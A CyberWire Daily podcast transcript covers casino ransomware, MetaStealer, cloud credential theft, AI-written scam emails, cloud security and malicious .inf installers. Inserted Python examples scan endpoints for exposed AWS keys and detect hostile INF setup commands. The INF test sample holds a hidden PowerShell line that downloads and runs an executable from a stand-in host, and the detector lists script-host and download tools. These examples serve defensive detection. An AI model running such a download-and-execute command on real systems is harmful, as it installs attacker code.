CyberWire Daily - Ransomware and materiality. MetaStealer hits businesses. Two looks at cloud risks. His Highness, the Large Language Model.
Episode Date: September 14, 2023
The MGM Resorts incident is now believed to be ransomware, and how does that inform our view of materiality of a cyber incident? MetaStealer targets businesses. Cloud access with stolen credentials. The cloud as an expansive attack surface. Johannes Ullrich from SANS describes malware in .inf files. In our Industry Voices segment Dave speaks with Oliver Tavakoli, CTO at Vectra, on the complexity and challenges of cloud service security. And welcome back, or not, Your Highness the Large Language Model, Prince of Nigeria. For links to all of today's stories check out our CyberWire daily news briefing: https://thecyberwire.com/newsletters/daily-briefing/12/176
Selected reading.
Caesars Entertainment Paid Millions to Hackers in Attack (Bloomberg)
Caesars Paid Ransom After Suffering Cyberattack (Wall Street Journal)
The Cyberattack That Sent Las Vegas Back in Time (Wall Street Journal)
Pro Take: MGM Casino Hack Shows Challenge in Defending Connected Tech (Wall Street Journal)
ALPHV Ransomware Used Vishing to Scam MGM Resorts Employee, Researchers (Hackread)
FBI probing MGM Resorts cyber incident as some casino systems still down (Reuters)
MGM Resorts says cyberattack could have material effect on company (NBC News)
MGM Resorts cybersecurity breach could cost millions, expert says (KLAS)
MGM Resorts shuts down some systems because of a "cybersecurity issue." (Updated.) (CyberWire)
macOS Info-Stealer Malware 'MetaStealer' Targeting Businesses (SecurityWeek)
"Authorized" to break in: Adversaries use valid credentials to compromise cloud environments (Security Intelligence)
Unit 42 Attack Surface Threat Report (Palo Alto Networks)
The Nigerian Prince is Alive and Well: Cybercriminals Use Generative… (Abnormal)
Transcript
You're listening to the Cyber Wire Network, powered by N2K.
The MGM Resorts incident is now believed to be ransomware,
so how does that inform our view of materiality of a cyber incident?
Metastealer targets businesses.
Cloud access with stolen credentials.
The cloud as an expansive attack surface.
Johannes Ullrich from SANS describes malware in .inf files.
In our Industry Voices segment, I speak with Oliver Tavakoli,
CTO at Vectra on the complexity and challenges of cloud service security.
And welcome back, Your Highness, the large language model, Prince of Nigeria.
I'm Dave Bittner with your CyberWire Intel briefing for Thursday, September 14th, 2023.
The attack on MGM Resorts International is now generally held to be a ransomware operation, but there's some lack of clarity over which gang is responsible.
vx-underground tweeted that the ALPHV ransomware gang had claimed responsibility
and that the attackers gained access through social engineering, specifically vishing.
They put it this way.
All ALPHV ransomware group did to compromise MGM Resorts was hop on LinkedIn, find an employee, then call the help desk.
Hackread offers a more extensive account of this attribution that's open to the possibility that the attackers may represent an ALPHV subgroup.
But it seems increasingly unlikely that it was ALPHV.
Other sources, Bloomberg and Reuters among them,
charged the attack to Scattered Spider,
also known as UNC3944, a younger criminal organization,
younger both in terms of its recent appearance and the ages of its members,
some of whom are believed to be teenagers operating from the U.S. and the U.K.
Some of the confusion may arise from Scattered Spider's use of ransomware encryptors
and dump site infrastructure made available by ALPHV.
ALPHV has traded these on C2C markets, the FBI says, since April of 2022, at least. In this case, there may have
been some direct collaboration between Scattered Spider and ALPHV. Scattered Spider has shown
considerable aptitude for social engineering, attributable in part to their vishing operators
being native speakers of English. The hospitality sector, and especially its casino subsector, has long been
more security-aware than most, but the Wall Street Journal concludes that connectivity in the industry
seems to have outrun the casinos' ability to secure their systems. Recovery has involved
reversion to many long-sidelined manual systems, giving the affected casinos a curiously retro, oddly analog
vibe. Bloomberg says that Scattered Spider is believed to have been responsible for a ransomware
attack against MGM Resorts competitor Caesars Entertainment a few weeks earlier. Caesars is
expected to disclose the attack, which began on August 27th, in regulatory filings imminently. The company had
not yet done so as of this morning. Bank Info Security reports indications that Caesars paid
the ransom demand, some $15 million, or half of the extortionists' demand. Moody's Investors Service
evaluated the incident and said in an assessment provided to the CyberWire that the incident is credit negative for MGM Resorts International.
The downtime in particular was a problem for a business that relies heavily on technology, especially when that downtime entails potential revenue losses.
MGM Resorts will also be dealing with reputational risk and any direct costs related to investigation and remediation.
There's a risk of litigation as well.
In general, Moody's regards the gaming and gambling industry as carrying moderate cybersecurity risk
because of its high degree of digitization and the large quantities of potentially valuable personal information companies in the sector tend to hold.
MGM Resorts International, in a Form 8-K filed yesterday with the Securities and Exchange Commission,
warned that the incident represents a material risk to the company.
New SEC regulations require companies to disclose cyber incidents that have a material effect on a public company.
There's been much discussion of what counts as materiality, with companies having considerable latitude in reaching their own definition. The ransomware attacks on MGM Resorts and
Caesars Entertainment offer two examples of companies' judgments of materiality.
SentinelOne has published an analysis of MetaStealer, a malware family
designed to target macOS. The malware is distributed via social engineering with business-themed lures.
SentinelOne says this specific targeting of business users is somewhat unusual for macOS malware,
which is more commonly found being distributed via torrent sites or
suspicious third-party software distributors as cracked versions of business, productivity,
or other popular software. Once installed, the malware attempts to exfiltrate data,
particularly passwords saved in the keychain. IBM X-Force has released its 2023 Cloud Threat Landscape report, finding that 36% of
cloud security incidents in 2023 resulted from the theft of valid credentials, compared to just 9%
in 2022. IBM says X-Force engagements reveal that often credentials with overprivileged access are left exposed on user endpoints in plain text,
creating an opportunity for attackers to establish a pivot point to move deeper into the environment or access highly sensitive information.
Specifically, plain text credentials were located on user endpoints in 33% of X-Force Red's adversary simulation engagements
that involved cloud environments during the reporting period. The researchers add Microsoft Outlook cloud credentials
accounted for over 5 million mentions on illicit marketplaces, by far the most popular access for
sale. Palo Alto Networks has released its Unit 42 Attack Surface Threat Report for 2023,
finding that 80% of security exposures are located in cloud environments.
These exposures are often introduced through changes in cloud services, which occur frequently.
Palo Alto Networks says over 45% of most organizations' high-risk cloud-hosted exposures in a given month
were observed on new services that hadn't been present on their organization's attack surface
in the month prior. Thus, the creation of new publicly accessible cloud services, both intended
and unauthorized, is a risk factor related to nearly half of all high-criticality exposures at a given time.
Finally, there's a new kid on the royal block, and we're not talking about the Duchess of Sussex either.
Abnormal Security warns that cybercriminals are using generative AI tools like ChatGPT
to improve classic Nigerian prince scams.
They say, spelling mistakes and grammatical errors
have long been characteristics of an attack,
making them easy to spot even if they did land in the inbox.
But with the rise of generative AI,
this is no longer the case.
Some threat actors are sending a combination
of human and AI-generated emails,
which the researchers think is an indication
that cybercriminals are still testing out the technology to determine how useful it may be for
their work. The scammers have also shifted the themes of these emails, with many of them referring
to business transactions rather than personal ones. So, you too, friend, could make a pile with a small upfront investment, or so we hear.
We pass that on without endorsement.
But seriously, it wounds us that machines do better with English than many graduates of American high schools.
Stay in school, friends, and, by the great horn spoon, in the shade of Mr. Noah Webster, fellow youths,
pay attention in your English class.
And once again, remind your loved ones, there is no Nigerian prince.
Coming up after the break, Johannes Ullrich from SANS describes malware in .inf files. In our Industry Voices segment, I speak with Oliver Tavakoli,
Chief Technology Officer at Vectra,
on the complexity and challenges of cloud service security.
Stay with us.
The migration that many organizations have made toward cloud data storage and security has brought with it an added dimension of complexity.
Managing cloud architecture, change controls,
and the basic differences between the various cloud providers
all present specific challenges and the potential for security issues.
Oliver Tavakoli is Chief Technology Officer at security firm Vectra,
and in this sponsored Industry Voices
segment, we discuss his insights on securing cloud environments. I think oftentimes what you see in
organizations is that the business need to be agile gets out ahead of the security side of
things. The security team doesn't typically want to be in the business of saying no. And so different business units go ahead and adopt some cloud systems. And then
eventually, the central security function is given the baton and asked to make sure that it's all
secure and that the business can meet its compliance mandates and that risk is mitigated
reasonably. And so oftentimes the security team,
I think, finds themselves chasing where the business is rather than laying the groundwork
in advance of the business going to cloud. Are there any common misperceptions with folks when
it comes to how they consider cloud security? Yeah, I think oftentimes cloud in general,
there's a euphemism. It's,
you know, your application running on someone else's compute or your data stored on somebody else's storage. But I think there are significant differences beyond that abstraction. And so
two key differences are, number one, from the point of view of an attacker,
each cloud system is relatively homogeneous and self-describing.
And so what that means is if I break into somebody on-prem, every environment is like its own unique snowflake.
And I have to spend a lot of time figuring out the ins and outs of how that environment is set up, what systems I can reach, how I deal with identity and stuff like that.
In the cloud, if you're attacking some AWS environment belonging to a particular customer, a particular tenant,
a particular organization, it's all very homogeneous
and it's all self-described.
And once you get API access to the environment,
you can actually just ask it about the entirety of the environment
without having to spend a lot of time doing reconnaissance
and other things like that.
So that's one difference.
The second key difference is that cloud systems are definitely leaky.
And so storage is an interesting example of that.
I think most people tend to think of storage as just part of the infrastructure as a service migration.
It's like, oh, yeah, I used to have my disks and now I have my storage.
You might even think of it as the equivalent of a file server that you have on-prem. The problem is that this is a file server that can be got at without going through your network.
internet and were not secured and people just downloaded gigabytes and gigabytes of data,
none of that data actually went through the network boundary of that cloud tenant,
the organization's cloud network. That's the other thing that's hard for people to get their head around, which is that all of these services, storage included, effectively have a backplane that bypasses their network controls.
Where on-prem, you could never basically exfiltrate 10 gigabytes of data without it going through the edge firewall, in this instance, you can.
And that is a new muscle to learn.
And so do folks have to adjust to this to kind of jettison that whole notion of there being a perimeter of
there being a moat around the castle? Yeah, I think you still would like to think of it as a
moat, but it becomes somewhat of a logical moat. It's like you have all the controls in place.
It's not easy to look at in one place and say, I am convinced that I have a DMZ, which is what you
would have in the old days. I know what controls I have. I know what's inbound and outbound.
Now you have a much more leaky perimeter.
You may have a concept of what you want your perimeter to be,
but there's this whole cottage industry now of checking whether the concept
of what you think your perimeter is and your actual perimeter actually match up.
So you may make unequivocally the statement that we have no
means of reaching our cloud tenant other than from our on-prem systems, and it may turn out to be an
untrue statement. So there's this whole cottage industry of external attack surface management,
which is attempting to find all the ways in which you might be leaky to the outside
that you may not be aware of.
You know, you and your colleagues there at Vectra,
when it comes to the folks that you're working with,
are there any common elements that you find for the folks who are finding success here?
Are there commonalities?
I think for the folks that succeed at this, we find that the security team has reasonable controls in place.
If the security team is chasing the rest of the business, it's really hard.
You can implement some detection capability, but ultimately it's very difficult if the rest of the business is not really committed to security.
It's committed first and foremost to agility and getting products out and getting services out.
I think when there's a balance,
when there is a reasonable balance
between the security team and the infrastructure and application teams
in terms of what they deploy, that's one.
I think the second one for us is that we find,
again, the security teams that have a reasonable balance in terms of prevention.
So they do some amount of cloud security posture management, but recognize that there is a lot of diminishing returns on that and have detection capabilities.
The other one that we find is more and more coming to the fore is the ability to kind of stitch these worlds together.
Attackers know that you have these series of interconnected systems.
Your cloud systems are some of those.
Your cloud identity, which is not really public cloud per se,
things like Azure AD or Okta is another element of that.
Your SaaS applications, it used to be you would run exchange servers on-prem. Now you're sending all your data to Microsoft 365 in the cloud. How are you securing those things? How
is access control to those things? I mean, we see all the business email compromise these days. A
lot of that is against cloud-hosted systems. These are more SaaS applications. And so the problem
then tends to be if you have this distributed attack surface across
on-prem, network, endpoint, and public cloud, and cloud identity, and SaaS applications,
how do you begin to stitch all of these things together? Because attackers may only leave a
certain amount of signal in any one of these places, which will make it rather difficult
to detect them there. But if you zoom out and look at the pattern across the entirety of your attack
surface, attacks become kind of more tractable and easier to find. So stitching these worlds
together is key. That is really kind of part of our XDR strategy is, you know, how do we provide
native signal for a lot of these surfaces and for the ones that we don't provide it for,
how do we import that signal and then stitch those worlds together so you don't have to.
That's Oliver Tavakoli from Vectra.
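The X-Force finding in the briefing above (plaintext, over-privileged cloud credentials sitting on user endpoints) is the concrete form of Oliver's point that a cloud tenant is self-describing once an attacker has API access: a key pair in a script is enough to start enumerating. As an added example, not part of the podcast, the X-Force report or any Vectra product, here is a small Python scanner for AWS-style access key IDs and their paired secrets in files an attacker might find on an endpoint. The file contents are constructed; the key and secret values are the placeholder credentials from AWS's own documentation, and the "known SDK store" paths and the launcher-versus-script distinction are this example's own assumptions.

```python
import re
from typing import Dict, List

# Constructed sample endpoint contents (not real captures). The key and
# secret values are the placeholder credentials from AWS's own documentation.
SAMPLE_FILES: Dict[str, str] = {
    "C:/Users/alice/.aws/credentials": (
        "[default]\n"
        "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "C:/Users/alice/Desktop/deploy.ps1": (
        '$env:AWS_ACCESS_KEY_ID = "AKIAI44QH8DHBEXAMPLE"\n'
        '$env:AWS_SECRET_ACCESS_KEY = "je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY"\n'
        "aws s3 sync ./build s3://prod-assets\n"
    ),
    "C:/Users/alice/notes.txt": "Ticket 4412: rotate the prod keys next sprint.\n",
}

# AKIA = long-lived IAM user key, ASIA = temporary STS key; both are 20 chars.
ACCESS_KEY_RE = re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")
# Secret access keys are 40 chars of a base64-like alphabet and normally sit
# next to a labelled variable; requiring the label keeps random hashes from matching.
SECRET_RE = re.compile(
    r"aws_secret_access_key\s*[=:]\s*[\"']?([A-Za-z0-9/+]{40})", re.IGNORECASE
)
# Paths where the SDK/CLI stores credentials by design (assumption: these are the
# ones worth distinguishing). Keys in loose scripts are worse: they get copied,
# committed and emailed.
KNOWN_CREDENTIAL_PATHS = (".aws/credentials", ".aws/config")


def scan_text(path: str, text: str) -> List[dict]:
    """Return one finding per access key ID found in `text`."""
    secrets = SECRET_RE.findall(text)
    findings = []
    for m in ACCESS_KEY_RE.finditer(text):
        findings.append({
            "path": path,
            "access_key_id": m.group(0),
            "long_lived": m.group(1) == "AKIA",
            "secret_present": bool(secrets),
            "in_sdk_store": path.replace("\\", "/").endswith(KNOWN_CREDENTIAL_PATHS),
        })
    return findings


def scan_files(files: Dict[str, str]) -> List[dict]:
    """Scan every (path, contents) pair; order follows the input mapping."""
    results: List[dict] = []
    for path, text in files.items():
        results.extend(scan_text(path, text))
    return results


def usable_by_attacker(findings: List[dict]) -> List[dict]:
    """Key ID plus secret is a pivot into the tenant with no exploit required."""
    return [f for f in findings if f["secret_present"]]


if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(finding)
```

A lone key ID without its secret is still worth reporting: it names the IAM principal, and the secret is often one directory away. In a real engagement the file walk replaces the constructed dictionary, and any hit should be checked against the account's CloudTrail for use from unexpected source addresses.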
And joining me once again is Johannes Ullrich.
He is the Dean of Research at the SANS Technology Institute
and also the host of the ISC Stormcast podcast.
Johannes, it's great to welcome you back to our show.
I know one of your colleagues, I believe,
has been looking at some malicious code embedded in .inf files.
What's going on here?
That was Xavier, and he came across this particular malware
that I thought was kind of interesting.
It's always amazing how attackers find new ways to deliver a malware
in ways that you don't necessarily expect
and that you don't necessarily inspect
when you're looking at attachments and such.
In this particular case, it was a .inf file.
Now, if you're a Windows user, you may have seen .inf files.
They're usually part of the setup tool that you're using to install software.
And typically, they just describe where the software is being copied to.
But everything is better with some kind of arbitrary code execution.
So they also have here something called
a RunPreSetupCommands section.
That's a section in the INF file
that allows you to run arbitrary commands.
The idea is you may want to prepare the system,
maybe create some directories
or do something along those lines,
maybe change some settings.
So you can basically add an arbitrary PowerShell script
to these INF files.
And now if the user installs a software, or at least that's what they think they do,
and of course this works even better if you can find some benign and trusted piece of software to do this with,
all the attacker has to do is change that one section in the INF file,
and now they can download additional files.
So it's masquerading as a legit file,
and indeed may function as a legit file,
but lurking within is this malicious code.
Yeah, and then of course there's always the social engineering aspect here. In this particular case, the additional software download installed,
they called it a corporate VPN client,
which I'm not sure if that's within the context
of a particular application.
But if you see on your system,
all of a sudden, some corporate VPN client,
well, you may discard it and say,
it's probably nothing, it's probably just something
corporate IT installed.
So what are your recommendations then
for folks to protect themselves here?
Block .inf files. I don't think there's a good reason why you should ever download one from the internet
or receive one in email.
And it's sort of that good old block list game, whack-a-mole, yet another extension to block.
It would be nice if someone would come up with a nice allow list to only list extensions that you actually need.
That's really difficult, too.
Right, right.
All right.
Well, good insights as always.
Johannes Ullrich, thanks for joining us.
Thank you.
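The mechanism Johannes describes above, a RunPreSetupCommands section referenced from [DefaultInstall] in an advpack-style INF, is easy to check for mechanically. As an added example, not part of the podcast and not the ISC diary's own sample or code, here is a Python scanner that parses an INF into sections, follows every RunPreSetupCommands and RunPostSetupCommands reference to its target section, and flags command lines that start a script host or well-known living-off-the-land binary or reference a URL. The INF text is constructed to mirror the described "corporate VPN client" lure; the launcher list and URL heuristic are this example's assumptions, not a complete detection rule.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample (not the ISC sample): an advpack-style INF whose
# pre-setup section creates a directory, then launches PowerShell to fetch
# and run a "corporate VPN client" from a URL.
SAMPLE_INF = """\
[Version]
Signature="$CHICAGO$"
AdvancedINF=2.5

[DefaultInstall]
CopyFiles=CopyFilesSection
RunPreSetupCommands=RunPreSetupCommandsSection:2

[CopyFilesSection]
setup.exe

[RunPreSetupCommandsSection]
mkdir "%ProgramFiles%\\CorpVPN"
powershell -nop -w hidden -c "iwr http://example.invalid/vpn.exe -OutFile %TEMP%\\vpn.exe; start %TEMP%\\vpn.exe"
"""

# Constructed benign INF: copies a file, runs nothing.
BENIGN_INF = """\
[Version]
Signature="$CHICAGO$"

[DefaultInstall]
CopyFiles=CopyFilesSection

[CopyFilesSection]
app.exe
"""

COMMAND_KEYS = ("runpresetupcommands", "runpostsetupcommands")
# Assumption: these launchers are rarely needed in a legitimate pre-setup step.
LAUNCHER_RE = re.compile(
    r"\b(powershell|pwsh|cmd|cscript|wscript|mshta|rundll32|regsvr32|certutil|bitsadmin|curl|wget)(\.exe)?\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def parse_inf(text: str) -> Dict[str, List[str]]:
    """Map lower-cased section name -> its non-blank, non-comment lines."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def command_section_refs(sections: Dict[str, List[str]]) -> List[Tuple[str, str]]:
    """(key, target_section) for each RunPre/PostSetupCommands= reference.
    The value may carry a ':flags' suffix (e.g. 'Section:2'), which is dropped."""
    refs: List[Tuple[str, str]] = []
    for lines in sections.values():
        for line in lines:
            key, sep, value = line.partition("=")
            if sep and key.strip().lower() in COMMAND_KEYS:
                refs.append((key.strip().lower(), value.split(":")[0].strip().lower()))
    return refs


def scan_inf(text: str) -> List[dict]:
    """One finding per command line reachable from a setup-command section."""
    sections = parse_inf(text)
    findings: List[dict] = []
    for key, target in command_section_refs(sections):
        for cmd in sections.get(target, []):
            reasons = []
            if LAUNCHER_RE.search(cmd):
                reasons.append("launches script host or LOLBin")
            if URL_RE.search(cmd):
                reasons.append("references a URL")
            findings.append({"via": key, "section": target, "command": cmd, "reasons": reasons})
    return findings


def is_suspicious(text: str) -> bool:
    """True when any reachable setup command trips a heuristic."""
    return any(f["reasons"] for f in scan_inf(text))


if __name__ == "__main__":
    for finding in scan_inf(SAMPLE_INF):
        print(finding)
```

The point of following the reference rather than grepping for "powershell" is that the command section can be named anything; only the RunPreSetupCommands/RunPostSetupCommands key in the install section tells you which lines will actually execute. Every reachable command is reported, including the innocuous mkdir, so an analyst sees the full sequence and not just the flagged line.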
And that's The Cyber Wire.
For links to all of today's stories,
check out our daily briefing at thecyberwire.com.
We'd love to know what you think of this podcast.
You can email us at cyberwire at n2k.com.
Your feedback helps us ensure
we're delivering the information and insights
that help keep you a step ahead in the rapidly changing world of cybersecurity.
by Liz Ervin and senior producer Jennifer Iben. Our mixer is Trey Hester with original music by Elliot Peltzman.
The show was written by our editorial staff.
Our executive editor is Peter Kilby
and I'm Dave Bittner.
Thanks for listening.
We'll see you back here tomorrow.